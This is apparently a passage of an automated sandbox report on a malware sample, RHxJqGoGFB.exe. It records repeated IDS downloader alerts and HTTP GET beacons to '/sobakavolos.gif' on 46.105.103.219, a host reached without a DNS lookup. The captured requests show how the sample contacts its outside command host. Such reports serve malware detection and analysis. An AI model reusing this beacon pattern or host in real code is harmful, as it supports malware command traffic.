        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49891 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49880 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49857 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49808 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49914 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49902 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49759 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49973 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49951 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49834 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49984 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49925 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50045 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50054 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49940 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50047 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50043 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50053 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50052 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49962 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50042 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50050 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50046 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49995 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50049 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50019 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50051 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50044 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50006 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50032 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50048 -> 46.105.103.219:80
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?6e1ab4=64942164 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?102407c=118473572 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1a7967a=83280750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?247d6b5=76524906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2e864a2=146353638 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?387ee8e=177720234 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4289802=69769218 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4c8fe82=722530962 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?55ce57c=359896560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?605f574=707376684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?6ac3c3a=1007558154 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?746f30a=366270750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7e81b91=530607684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b40fdb1=566425875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10c254e3=1687027026 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?16620ca3=1502098060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2700512b=-1677638484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?372892a3=1257467858 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3d30b7a9=838047309 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?425e98d5=-1908960002 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?53792577=-1494070546 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?590aff39=-1307181454 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?60d9e770=579712592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7ccb59f9=1986137579 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8195d24a=265959140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8756340a=-1778213858 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8d11c4a2=-174069326 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?9241e677=612617454 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?a34963b3=-371447015 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?a74235ca=-343063876 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?aea19a18=1564685360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b104bfd4=-685687092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b4156853=1747636390 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b8d36d83=-1675549809 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?bd601994=2059416360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c1fee9b0=267865472 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c535894d=349578548 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c977e755=-1829777750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?cc9358d1=843932484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d0255c4e=-1325038046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d42c48fe=-1470590468 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d7244def=-503438967 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?dae7c7e6=-1244688436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?deb2d253=-1676118279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?e40c8c88=-937879280 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?e7c0a656=226918236 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?eaf3a57c=-2118786840 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?ee5adceb=1926686552 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: unknownTCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008F7A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,0_2_008F7A3A
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?6e1ab4=64942164 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?102407c=118473572 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1a7967a=83280750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?247d6b5=76524906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2e864a2=146353638 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?387ee8e=177720234 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4289802=69769218 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4c8fe82=722530962 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?55ce57c=359896560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?605f574=707376684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?6ac3c3a=1007558154 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?746f30a=366270750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7e81b91=530607684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b40fdb1=566425875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10c254e3=1687027026 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?16620ca3=1502098060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2700512b=-1677638484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?372892a3=1257467858 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3d30b7a9=838047309 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?425e98d5=-1908960002 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?53792577=-1494070546 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?590aff39=-1307181454 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?60d9e770=579712592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7ccb59f9=1986137579 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8195d24a=265959140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8756340a=-1778213858 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?8d11c4a2=-174069326 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?9241e677=612617454 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?a34963b3=-371447015 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?a74235ca=-343063876 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?aea19a18=1564685360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b104bfd4=-685687092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b4156853=1747636390 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?b8d36d83=-1675549809 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?bd601994=2059416360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c1fee9b0=267865472 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c535894d=349578548 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c977e755=-1829777750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?cc9358d1=843932484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d0255c4e=-1325038046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d42c48fe=-1470590468 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?d7244def=-503438967 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?dae7c7e6=-1244688436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?deb2d253=-1676118279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?e40c8c88=-937879280 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
